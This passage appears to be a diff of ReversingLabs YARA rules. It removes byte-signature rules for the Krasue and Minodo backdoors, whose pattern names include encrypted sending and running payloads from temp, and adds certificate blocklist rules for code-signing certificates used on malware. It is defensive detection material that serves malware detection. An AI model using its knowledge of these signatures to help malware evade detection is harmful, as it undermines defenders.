4C 8D 74 24 ?? 4C 89 E2 - E8 ?? ?? ?? ?? 48 98 48 8D 54 24 ?? 48 89 DE C6 04 18 ?? 4C 89 F7 E8 ?? ?? ?? ?? 48 - 8B 7C 24 ?? 31 F6 E8 ?? ?? ?? ?? 85 C0 74 ?? 4C 89 E1 4C 89 E2 BE ?? ?? ?? ?? 48 89 - DF 49 89 E9 4D 89 E0 31 C0 E8 ?? ?? ?? ?? 48 8B 7C 24 ?? 41 89 C5 B9 ?? ?? ?? ?? 89 - C2 48 89 DE E8 ?? ?? ?? ?? 48 8B 7C 24 ?? 31 F6 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? - ?? 48 8B 54 24 ?? 48 89 DF BE ?? ?? ?? ?? 31 C0 E8 ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? - ?? 4C 89 E2 BE ?? ?? ?? ?? 48 89 DF 31 C0 E8 ?? ?? ?? ?? 48 98 48 89 E7 31 C9 C6 04 - 18 ?? BA ?? ?? ?? ?? 48 89 DE E8 ?? ?? ?? ?? 48 8B 2C 24 BE ?? ?? ?? ?? 48 89 EF E8 - ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48 89 DF 48 8D 5D ?? BD ?? ?? ?? ?? E8 ?? ?? - ?? ?? 48 39 EB 0F 85 ?? ?? ?? ?? 48 8B 5C 24 ?? 48 83 EB ?? 48 39 DD 0F 85 ?? ?? ?? - ?? 49 8D 5C 24 ?? 48 39 DD 0F 85 ?? ?? ?? ?? 49 81 FF ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? - 48 8B 5C 24 ?? 48 8B 6C 24 ?? 4C 8B 64 24 ?? 4C 8B AC 24 ?? ?? ?? ?? 4C 8B B4 24 ?? - ?? ?? ?? 4C 8B BC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 - } - $get_device_name_v7 = { - 48 89 5C 24 ?? 48 89 6C 24 ?? BE ?? ?? ?? ?? 4C 89 64 24 ?? 4C 89 6C 24 ?? B9 ?? ?? - ?? ?? 4C 89 74 24 ?? 48 81 EC ?? ?? ?? ?? 4C 8B 05 ?? ?? ?? ?? 48 8D 5C 24 ?? BA ?? - ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 48 89 DE BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 5C 24 - ?? 41 BD ?? ?? ?? ?? 48 83 EB ?? 4C 39 EB 0F 85 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 - 83 78 ?? ?? 75 ?? 48 8D 5C 24 ?? 48 89 DF E8 ?? ?? ?? ?? 48 89 DE BF ?? ?? ?? ?? E8 - ?? ?? ?? ?? 48 8B 5C 24 ?? 48 83 EB ?? 49 39 DD 0F 85 ?? ?? ?? ?? 48 8B 0D ?? ?? ?? - ?? 48 8B 15 ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 7C 24 ?? - E8 ?? ?? ?? ?? 4C 8B 64 24 ?? 48 89 E7 E8 ?? ?? ?? ?? 48 8B 2C 24 48 8D 5C 24 ?? 41 - B8 ?? ?? ?? ?? 4C 89 E2 BE ?? ?? ?? ?? 31 C0 48 89 DF 48 89 E9 E8 ?? ?? ?? ?? 48 89 - DE BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 5C 24 ?? 48 83 EB ?? 49 39 DD 0F 85 ?? ?? ?? - ?? E8 ?? ?? ?? ?? 48 8D 5D ?? 49 39 DD 0F 85 ?? ?? ?? ?? 49 8D 5C 24 ?? 49 39 DD 0F - 85 ?? ?? ?? ?? 48 8B 5C 24 ?? 48 8B 6C 24 ?? 4C 8B 64 24 ?? 4C 8B 6C 24 ?? 4C 8B B4 - 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 - } - $generate_machine_id_v7 = { - 41 57 31 C9 BA ?? ?? ?? ?? BE ?? ?? ?? ?? 49 89 FF 41 56 41 55 41 54 55 53 48 81 EC - ?? ?? ?? ?? 4C 8D A4 24 ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 4C 89 E7 E8 ?? ?? ?? ?? - 48 8B B4 24 ?? ?? ?? ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 89 EF E8 ?? ?? ?? ?? 48 8B - 84 24 ?? ?? ?? ?? 48 83 78 ?? ?? 0F 84 ?? ?? ?? ?? 48 8D 9C 24 ?? ?? ?? ?? 31 C9 BA - ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 48 89 DE 48 89 EF E8 ?? ?? ?? ?? - 48 8B B4 24 ?? ?? ?? ?? 48 8D BC 24 ?? ?? ?? ?? 48 8B 56 ?? E8 ?? ?? ?? ?? 31 FF 4C - 8B B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 C7 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? - ?? 89 C6 48 8D BC 24 ?? ?? ?? ?? F7 EA 89 F1 89 F5 C1 F9 ?? C1 FA ?? 29 CA 69 D2 ?? - ?? ?? ?? 29 D5 E8 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 41 89 E8 31 C0 4C 89 F1 BE ?? - ?? ?? ?? 48 89 E7 41 BD ?? ?? ?? ?? 48 89 DA 48 83 EB ?? E8 ?? ?? ?? ?? 4C 39 EB 89 - C5 0F 85 ?? ?? ?? ?? 48 63 C5 48 8D 94 24 ?? ?? ?? ?? 48 8D BC 24 ?? ?? ?? ?? C6 04 - 04 ?? 48 89 E6 E8 ?? ?? ?? ?? 48 8D 94 24 ?? ?? ?? ?? 48 89 E6 4C 89 FF E8 ?? ?? ?? - ?? 48 8B 9C 24 ?? ?? ?? ?? 48 83 EB ?? 49 39 DD 0F 85 ?? ?? ?? ?? 49 8D 5E ?? 49 39 - DD 0F 85 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 83 EB ?? 49 39 DD 0F 85 ?? ?? ?? ?? - 48 8B 9C 24 ?? ?? ?? ?? 48 83 EB ?? 49 39 DD 0F 85 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? - ?? 48 83 EB ?? 49 39 DD 0F 85 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 4C 89 F8 5B 5D 41 5C - 41 5D 41 5E 41 5F C3 - } - condition: - uint32(0)==0x464C457F and (($persistence_mechanism_ubuntu) and ( all of ($network_communication_*)) and ((($change_timestamp_and_read_config_v11) and ($persistence_mechanism_redhat_v11) and ($generate_machine_id_v11)) or (($persistence_mechanism_redhat_v7) and ($get_device_name_v7) and ($generate_machine_id_v7)))) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Booz Allen Hamilton Inc." and pe.signatures[i].serial=="40:f5:66:0a:90:30:1e:7a:8a:8c:3b:42" and 1641833688<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Linux_Backdoor_Krasue : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_0400C7614F86D75Fe4Ee3F6192B6Feda : INFO FILE { meta: - description = "Yara rule that detects Krasue backdoor." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "3187eebf-ef70-585f-85cf-5813025c785e" - date = "2024-03-04" - modified = "2024-03-04" + id = "500c9604-cc07-52b1-8c46-09894d132205" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/backdoor/Linux.Backdoor.Krasue.yara#L1-L127" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "e2daa35ef9e0793062c9fb3bd8e4838e1e81ee3d228d8117b1c3b0e72eb8e151" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L12140-L12156" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "47735267e9a0fb8107f6c4008bacc8aada1705f6714a0447dacc3928fc20cad6" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Backdoor" - tc_detection_name = "Krasue" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $switch_server = { - 8B 05 ?? ?? ?? ?? FF C0 3B 05 ?? ?? ?? ?? 89 05 ?? ?? ?? ?? 7C ?? C7 05 ?? ?? ?? ?? - ?? ?? ?? ?? 48 63 05 ?? ?? ?? ?? 85 C0 75 ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? EB ?? 8B - 15 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? C6 05 ?? ?? ?? ?? ?? C6 05 ?? ?? ?? ?? - ?? 89 15 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 66 89 15 ?? ?? 23 00 48 8B 04 C5 ?? ?? ?? ?? - 66 C7 05 ?? ?? 23 00 ?? ?? 8B 10 89 15 ?? ?? ?? ?? 66 8B 40 ?? 66 89 05 ?? ?? 23 00 - C3 - } - $get_hostname = { - 41 55 41 54 31 F6 55 53 31 C0 BF ?? ?? ?? ?? 48 81 EC ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 - C0 0F 88 ?? ?? ?? ?? 48 89 E6 89 C7 89 C3 E8 ?? ?? ?? ?? 48 8B 6C 24 ?? 45 31 C9 31 - FF 41 89 D8 B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 41 89 EC 48 63 ED 48 89 EE E8 ?? ?? ?? ?? - BE ?? ?? ?? ?? 48 89 C7 49 89 C5 E8 ?? ?? ?? ?? 83 F8 ?? 74 ?? 48 63 D0 49 8D 74 15 - ?? 8D 50 ?? 48 63 D2 44 39 E2 41 89 D0 7D ?? 48 FF C2 41 80 7C 15 ?? ?? 75 ?? 44 89 - C1 41 FF C8 BA ?? ?? ?? ?? 29 C1 4D 63 C0 48 89 D7 83 E9 ?? 48 63 C9 F3 A4 41 C6 80 - ?? ?? ?? ?? ?? 4C 89 EF 48 89 EE E8 ?? ?? ?? ?? 89 DF E8 ?? ?? ?? ?? 48 81 C4 ?? ?? - ?? ?? 5B 5D 41 5C 41 5D C3 - } - $start_server_p1 = { - 41 57 41 56 31 D2 41 55 41 54 BE ?? ?? ?? ?? 55 53 89 FB BF ?? ?? ?? ?? 48 81 EC ?? - ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 89 05 ?? ?? ?? ?? 79 ?? 83 CF ?? E9 ?? ?? ?? ?? 48 8D - 4C 24 ?? 41 B8 ?? ?? ?? ?? BE ?? ?? ?? ?? BA ?? ?? ?? ?? 89 C7 C7 44 24 ?? ?? ?? ?? - ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 31 C0 B9 ?? ?? ?? ?? 48 89 D7 F3 AB 31 FF 66 C7 05 - ?? ?? 23 00 ?? ?? E8 ?? ?? ?? ?? 0F B7 FB 89 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 3D ?? - ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 66 89 05 ?? ?? 23 00 E8 ?? ?? ?? ?? 85 C0 78 - ?? 4C 8D A4 24 ?? ?? ?? ?? 4C 8D AC 24 ?? ?? ?? ?? 4C 8D 74 24 ?? C7 05 ?? ?? ?? ?? - ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 31 C9 41 B9 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? BA ?? ?? ?? - ?? BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 48 89 C3 0F 88 ?? ?? ?? ?? 31 C0 B9 ?? ?? ?? - ?? 4C 89 E7 83 FB ?? F3 AB 7E ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 4C 89 E7 E8 ?? ?? ?? - ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 44 8D 08 31 C9 BA - ?? ?? ?? ?? BE ?? ?? ?? ?? E8 ?? ?? ?? ?? EB ?? 83 FB ?? 75 ?? BE ?? ?? ?? ?? 4C 89 - E7 E8 ?? ?? ?? ?? 85 C0 75 ?? 8B 05 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 89 05 - ?? ?? ?? ?? E9 ?? ?? ?? ?? 89 DA BE ?? ?? ?? ?? 4C 89 E7 E8 ?? ?? ?? ?? 4C 89 E6 89 - C2 8A 06 89 F5 44 29 E5 3C ?? 75 ?? 80 7E ?? ?? 75 ?? 48 83 C6 ?? EB ?? 3C ?? 75 ?? - 80 7E ?? ?? 75 ?? 41 B8 ?? ?? ?? ?? 31 C0 B9 ?? ?? ?? ?? 4C 89 C7 4C 8B 05 ?? ?? ?? - ?? F3 AB 8B 7E ?? 66 8B 4E ?? 4C 89 06 C6 06 ?? 45 31 C0 C6 46 ?? ?? BE - } - $start_server_p2 = { - 66 C7 05 ?? ?? 23 00 ?? ?? 89 3D ?? ?? ?? ?? 66 89 0D ?? ?? 23 00 89 3D ?? ?? ?? ?? - 66 89 0D ?? ?? 23 00 48 89 F7 B9 ?? ?? ?? ?? 4C 89 E6 F3 AB E9 ?? ?? ?? ?? 85 ED 75 - ?? 48 63 DD BA ?? ?? ?? ?? BE ?? ?? ?? ?? 4C 01 E3 48 89 DF E8 ?? ?? ?? ?? 85 C0 75 - ?? 48 8D 7B ?? E8 ?? ?? ?? ?? 6B C0 ?? B9 ?? ?? ?? ?? BE ?? ?? ?? ?? 4C 89 EF 99 F7 - F9 31 C0 E8 ?? ?? ?? ?? EB ?? 8D 45 ?? 48 8D 54 24 ?? 48 98 85 C0 78 ?? 49 8B 0C 04 - 48 83 C2 ?? 48 83 E8 ?? 48 89 4A ?? C6 42 ?? ?? C6 42 ?? ?? EB ?? BA ?? ?? ?? ?? BE - ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 85 C0 75 ?? 48 8B 05 ?? ?? ?? ?? 89 E9 4C 89 F6 - 89 2D ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 05 ?? ?? ?? ?? B8 ?? ?? ?? ?? - 48 89 C7 F3 A4 BE ?? ?? ?? ?? 4C 89 EF E8 ?? ?? ?? ?? 31 C0 48 83 C9 ?? 4C 89 EF F2 - AE 48 89 C8 48 F7 D0 48 8D 50 ?? E9 ?? ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 - DF E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 44 8B 0D ?? ?? ?? ?? 44 - 8B 3D ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 89 4C 24 ?? 44 89 4C 24 ?? E8 ?? ?? ?? ?? 48 83 - EC ?? 41 89 C0 BA ?? ?? ?? ?? 8B 4C 24 ?? 4C 89 EF BE ?? ?? ?? ?? 31 C0 51 8B 0D ?? - ?? ?? ?? 41 57 53 44 8B 4C 24 ?? E8 ?? ?? ?? ?? 31 C0 48 83 C9 ?? 4C 89 EF F2 AE 48 - 83 C4 ?? 48 89 C8 48 F7 D0 48 8D 50 ?? 41 89 E8 4C 89 F1 4C 89 EE 8B 3D ?? ?? ?? ?? - E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 DF E8 - } - $start_server_p3 = { - 85 C0 75 ?? 31 FF E8 ?? ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? - ?? 85 C0 75 ?? BF ?? ?? ?? ?? EB ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 DF E8 ?? ?? - ?? ?? 85 C0 75 ?? BF ?? ?? ?? ?? EB ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 DF E8 ?? - ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 41 89 C7 E8 ?? ?? ?? ?? 45 85 FF 0F - 85 ?? ?? ?? ?? 48 8D 7C 24 ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 41 89 C4 75 ?? 8B - 7C 24 ?? E8 ?? ?? ?? ?? 8B 7C 24 ?? BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 7C 24 ?? BE ?? - ?? ?? ?? E8 ?? ?? ?? ?? 8B 7C 24 ?? E8 ?? ?? ?? ?? 48 8D 4B ?? 45 31 C0 BA ?? ?? ?? - ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? 31 C0 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 7C 24 ?? E8 - ?? ?? ?? ?? 8B 7C 24 ?? 48 8D B4 24 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 - 89 C3 7E ?? 4C 8D AC 24 ?? ?? ?? ?? 8D 04 2B 3D ?? ?? ?? ?? 7E ?? 8B 3D ?? ?? ?? ?? - BA ?? ?? ?? ?? 48 8D 4C 24 ?? 4C 89 EE 29 EA 41 89 E8 49 81 C5 ?? ?? ?? ?? 81 EB ?? - ?? ?? ?? E8 ?? ?? ?? ?? EB ?? 8B 3D ?? ?? ?? ?? 48 8D 4C 24 ?? 41 89 E8 89 DA 4C 89 - EE E8 ?? ?? ?? ?? EB ?? 31 F6 BA ?? ?? ?? ?? 44 89 E7 E8 ?? ?? ?? ?? 85 C0 0F 85 - } - $send_encrypt = { - E8 ?? ?? ?? ?? 41 8D 7E ?? 49 89 C5 48 63 FF E8 ?? ?? ?? ?? 48 63 54 24 ?? 48 89 C7 - 4C 89 FE 48 8D 0C 13 C6 04 08 ?? 89 D1 48 01 C2 F3 A4 48 89 D7 48 89 EE 48 89 D9 44 - 89 F2 F3 A4 48 89 C6 EB ?? 8D 7B ?? 48 63 FF E8 ?? ?? ?? ?? 89 DA 49 89 C5 48 89 EE - 4C 89 EF E8 ?? ?? ?? ?? 44 8B 0D ?? ?? ?? ?? 4C 89 EE 44 89 E7 48 63 D0 41 B8 ?? ?? - ?? ?? 31 C9 E8 ?? ?? ?? ?? 48 83 C4 ?? 5B 5D 41 5C 41 5D 41 5E 41 5F C3 - } - $notify_server = { - 48 81 EC ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 48 89 E0 85 D2 7E ?? BE ?? ?? ?? ?? 89 D1 48 - 89 E7 F3 A4 48 63 D2 BE ?? ?? ?? ?? B9 ?? ?? ?? ?? 4C 8D 04 10 41 B9 ?? ?? ?? ?? 48 - 83 C2 ?? 4C 89 C7 41 B8 ?? ?? ?? ?? F3 A4 8B 3D ?? ?? ?? ?? 48 89 C6 E8 ?? ?? ?? ?? - 8B 05 ?? ?? ?? ?? 89 05 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 - } - condition: - uint32(0)==0x464C457F and ($switch_server) and ($get_hostname) and ( all of ($start_server_p*)) and ($send_encrypt) and ($notify_server) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "StackUp ApS" and pe.signatures[i].serial=="04:00:c7:61:4f:86:d7:5f:e4:ee:3f:61:92:b6:fe:da" and 1626393601<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Backdoor_Minodo : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_E573D9C8B403C41Bd59Ffa0A8Efd4168 : INFO FILE { meta: - description = "Yara rule that detects Minodo backdoor." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "0eeff863-1a46-5b25-8780-5cd887e3b1e2" - date = "2023-06-07" - modified = "2023-06-07" + id = "2e799dd9-d143-55a7-9d07-d5f289477b24" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/backdoor/Win64.Backdoor.Minodo.yara#L1-L110" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "807408699fe00c8d1170598050e533dd0d79bb170f2538b6b6227cda7410060b" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L12158-L12176" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "425126b90fe2ab7c1ec7bf2fd5a91e4438a81992f20f99ed87ec62e7f20043cd" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Backdoor" - tc_detection_name = "Minodo" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $generate_system_id = { - 40 55 53 56 57 41 56 48 8D 6C 24 ?? 48 81 EC ?? ?? ?? ?? 4C 8B F1 48 8D 55 ?? 48 8D - 4D ?? C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 33 DB 85 C0 75 ?? 66 C7 45 ?? ?? ?? 4C - 8D 45 ?? 48 8D 55 ?? B9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 - ?? 66 C7 45 ?? ?? ?? 48 83 4D ?? ?? 4C 8D 4D ?? 4C 8D 45 ?? 8B CB 48 8B D3 BE ?? ?? - ?? ?? 48 85 D2 7E ?? 44 8A 54 15 ?? EB ?? 44 8A 95 ?? ?? ?? ?? 41 8A 01 49 FF C1 48 - FF C2 32 44 15 ?? 41 32 C2 41 32 00 49 FF C0 88 44 15 ?? 41 38 19 75 ?? 83 C9 ?? 4C - 8D 4D ?? 41 38 18 75 ?? 83 C9 ?? 4C 8D 45 ?? 48 3B D6 75 ?? 83 C9 ?? 48 8B D3 83 F9 - ?? 75 ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4D ?? FF 15 ?? ?? ?? ?? 48 8D 5D ?? 49 8B FE 44 - 0F B6 03 48 8D 55 ?? 48 8B CF FF 15 ?? ?? ?? ?? 48 83 C7 ?? 48 FF C3 48 FF CE 75 ?? - FF 15 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4D ?? 8B D8 FF 15 ?? ?? ?? ?? 48 8D 55 - ?? 44 8B CB 4D 8B C6 49 8B CE FF 15 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 41 5E 5F 5E 5B - 5D C3 - } - $generate_encrypt_and_send_key = { - 48 8B C4 48 89 58 ?? 48 89 68 ?? 48 89 70 ?? 48 89 78 ?? 41 56 48 81 EC ?? ?? ?? ?? - 8B F2 E8 ?? ?? ?? ?? 48 85 C0 75 ?? 33 C0 E9 ?? ?? ?? ?? 48 8B 40 ?? 48 8B 08 8B 09 - E8 ?? ?? ?? ?? 48 8B F8 48 85 C0 74 ?? 45 33 C0 45 8D 70 ?? 41 8D 50 ?? 41 8B CE E8 - ?? ?? ?? ?? 48 8B D8 83 F8 ?? 74 ?? 41 8D 6E ?? 48 8D 44 24 ?? 8B CD C6 00 ?? 48 FF - C0 48 FF C9 75 ?? 0F B7 CE 66 44 89 74 24 ?? E8 ?? ?? ?? ?? 48 8B CF 66 89 44 24 ?? - E8 ?? ?? ?? ?? 48 63 FB 48 8D 54 24 ?? 48 8B CF 44 8B C5 89 44 24 ?? E8 ?? ?? ?? ?? - 85 C0 74 ?? 48 8B CF E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8D 2D ?? ?? ?? ?? BE ?? ?? ?? - ?? 48 8B CD 8B D6 E8 ?? ?? ?? ?? 66 C7 44 24 ?? ?? ?? 33 C9 8A 44 29 ?? 48 FF C9 88 - 44 0C ?? 48 FF CE 75 ?? 8D 56 ?? 44 8D 46 ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 48 8B CF - 8B F0 85 C0 74 ?? 48 8D 54 24 ?? 45 33 C9 44 8B C0 E8 ?? ?? ?? ?? 3B C6 74 ?? 48 8B - CF E8 ?? ?? ?? ?? 33 DB 8B C3 4C 8D 9C 24 ?? ?? ?? ?? 49 8B 5B ?? 49 8B 6B ?? 49 8B - 73 ?? 49 8B 7B ?? 49 8B E3 41 5E C3 - } - $get_encrypt_and_send_system_info = { - 48 89 5C 24 ?? 48 89 74 24 ?? 48 89 7C 24 ?? 55 48 8D 6C 24 ?? 48 81 EC ?? ?? ?? ?? - 8B F1 48 8B CA 48 8B DA FF 15 ?? ?? ?? ?? C6 44 24 ?? ?? 48 63 F8 40 88 7C 24 ?? 4C - 8B C7 85 C0 74 ?? 48 8D 44 24 ?? 48 2B D8 48 8D 4C 24 ?? 49 FF C8 4A 8D 0C 01 8A 04 - 0B 88 01 75 ?? 83 C7 ?? 48 63 DF E8 ?? ?? ?? ?? BA ?? ?? ?? ?? F6 D8 48 8D 45 ?? 1A - C9 80 E1 ?? 80 C9 ?? FF C7 88 4C 1C ?? 8B CA C6 00 ?? 48 FF C0 48 FF C9 75 ?? 48 8D - 4D ?? 89 55 ?? FF 15 ?? ?? ?? ?? 8A 45 ?? 48 63 CF 88 44 0C ?? 8A 45 ?? FF C7 48 63 - CF FF C7 BB ?? ?? ?? ?? 88 44 0C ?? 8A 45 ?? 48 63 CF 88 44 0C ?? 8A 45 ?? FF C7 48 - 63 CF FF C7 4C 8D 85 ?? ?? ?? ?? 88 44 0C ?? 8A 45 ?? 48 63 D7 88 44 14 ?? 8B 45 ?? - FF C7 48 63 D7 8D 4B ?? C6 44 24 ?? ?? 89 44 14 ?? 48 8D 54 24 ?? 83 C7 ?? 89 9D ?? - ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8D 4C 24 ?? FF 15 ?? ?? ?? ?? 44 8B C0 8D 48 ?? 03 CF - 48 63 D1 48 83 FA ?? 76 ?? 44 8D 43 ?? 44 2B C7 48 63 C7 FF C7 4C 8D 54 24 ?? 44 88 - 44 04 ?? 48 63 C7 49 63 D0 4C 03 D0 45 85 C0 74 ?? 4C 8D 4C 24 ?? 4A 8D 0C 12 4D 2B - CA 48 FF C9 41 8A 04 09 88 01 48 FF CA 75 ?? 48 8D 95 ?? ?? ?? ?? 48 8D 4C 24 ?? 41 - 03 F8 C6 44 24 ?? ?? 89 9D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8D 4C 24 ?? FF 15 ?? ?? - ?? ?? 44 8B C0 8D 48 ?? 03 CF 48 63 D1 48 83 FA ?? 76 ?? 41 B8 ?? ?? ?? ?? 44 2B C7 - 48 63 C7 FF C7 4C 8D 54 24 ?? 44 88 44 04 ?? 48 63 C7 49 63 D0 4C 03 D0 45 85 C0 74 - ?? 4C 8D 4C 24 ?? 4A 8D 0C 12 4D 2B CA 48 FF C9 42 8A 04 09 88 01 48 FF CA 75 ?? 4C - 8D 4C 24 ?? 48 8D 54 24 ?? 44 03 C7 8B CE E8 ?? ?? ?? ?? 4C 8D 9C 24 ?? ?? ?? ?? 49 - 8B 5B ?? 49 8B 73 ?? 49 8B 7B ?? 49 8B E3 5D C3 - } - $copy_payload_into_allocated_memory = { - 48 89 5C 24 ?? 48 89 6C 24 ?? 56 57 41 56 48 83 EC ?? 49 8B D8 48 63 F2 48 8B F9 41 - C6 00 ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 75 ?? 66 C7 03 ?? ?? B8 ?? ?? - ?? ?? E9 ?? ?? ?? ?? 4C 8D 4C 24 ?? 4C 8D 44 24 ?? 48 8B D3 48 8B CF E8 ?? ?? ?? ?? - 8B E8 85 C0 74 ?? 41 B9 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 48 8B D6 33 C9 4C 8B F6 FF 15 - ?? ?? ?? ?? 48 8B F0 48 85 C0 75 ?? 66 C7 03 ?? ?? FF 15 ?? ?? ?? ?? 89 43 ?? 8D 46 - ?? EB ?? 4D 8B C6 48 8B D7 48 8B C8 E8 ?? ?? ?? ?? 48 83 64 24 ?? ?? 83 64 24 ?? ?? - 4C 8D 04 2E 45 33 C9 33 D2 33 C9 FF 15 ?? ?? ?? ?? 48 8B C8 FF 15 ?? ?? ?? ?? 8B 44 - 24 ?? 48 8B 5C 24 ?? 48 8B 6C 24 ?? 48 83 C4 ?? 41 5E 5F 5E C3 - } - $execute_payload_from_temp = { - 40 53 48 81 EC ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 4C 8B D1 48 8D 44 24 ?? 41 8B D0 33 DB - 88 18 48 FF C0 48 FF CA 75 ?? 48 8D 44 24 ?? 8D 4A ?? 88 18 48 FF C0 48 FF C9 75 ?? - 48 8D 44 24 ?? 44 89 44 24 ?? 45 33 C9 48 89 44 24 ?? 48 8D 44 24 ?? 45 33 C0 48 89 - 44 24 ?? 48 89 5C 24 ?? 48 89 5C 24 ?? 49 8B D2 89 5C 24 ?? C7 84 24 ?? ?? ?? ?? ?? - ?? ?? ?? 89 5C 24 ?? 66 89 9C 24 ?? ?? 00 00 FF 15 ?? ?? ?? ?? 85 C0 74 